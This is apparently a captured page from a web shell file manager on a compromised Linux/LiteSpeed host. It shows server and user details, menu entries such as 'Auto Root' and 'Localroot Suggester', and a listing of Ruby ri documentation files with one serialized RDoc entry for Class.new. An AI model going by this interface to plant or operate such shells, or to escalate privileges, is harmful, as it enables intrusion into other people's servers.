Linux server1.dn-server.com 4.18.0-553.89.1.lve.el8.x86_64 #1 SMP Wed Dec 10 13:58:50 UTC 2025 x86_64
LiteSpeed
Server IP : 195.201.204.189 & Your IP : 216.73.216.45
Domains :
Cant Read [ /etc/named.conf ]
User : beriska1
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
ruby30 /
share /
ri /
system /
Class /
Delete
Unzip
Name
Size
Permission
Date
Action
allocate-i.ri
786
B
-rw-r--r--
2024-06-26 17:25
cdesc-Class.ri
2.92
KB
-rw-r--r--
2024-06-26 17:25
inherited-i.ri
755
B
-rw-r--r--
2024-06-26 17:25
json_creatable%3f-i.ri
546
B
-rw-r--r--
2024-06-26 17:25
new-c.ri
1.16
KB
-rw-r--r--
2024-06-26 17:25
new-i.ri
557
B
-rw-r--r--
2024-06-26 17:25
superclass-i.ri
789
B
-rw-r--r--
2024-06-26 17:25
Save
Rename
U:RDoc::AnyMethod[iI"new:ETI"Class::new;TT:privateo:RDoc::Markup::Document:@parts[o:RDoc::Markup::Paragraph; [I"GCreates a new anonymous (unnamed) class with the given superclass ;TI":(or Object if no parameter is given). You can give a ;TI">class a name by assigning the class object to a constant.;To:RDoc::Markup::BlankLine o; ; [I"GIf a block is given, it is passed the class object, and the block ;TI"4is evaluated in the context of this class like ;TI"#class_eval.;T@o:RDoc::Markup::Verbatim; [I"fred = Class.new do ;TI" def meth1 ;TI" "hello" ;TI" end ;TI" def meth2 ;TI" "bye" ;TI" end ;TI" end ;TI" ;TI">a = fred.new #=> #<#<Class:0x100381890>:0x100376b98> ;TI""a.meth1 #=> "hello" ;TI" a.meth2 #=> "bye" ;T:@format0o; ; [I"EAssign the class to a constant (name starting uppercase) if you ;TI"+want to treat it like a regular class.;T: @fileI" object.c;T:0@omit_headings_from_table_of_contents_below0I"sClass.new(super_class=Object) -> a_class Class.new(super_class=Object) { |mod| ... } -> a_class ;T0[ I"(*args);T@(FI" Class;TcRDoc::NormalClass00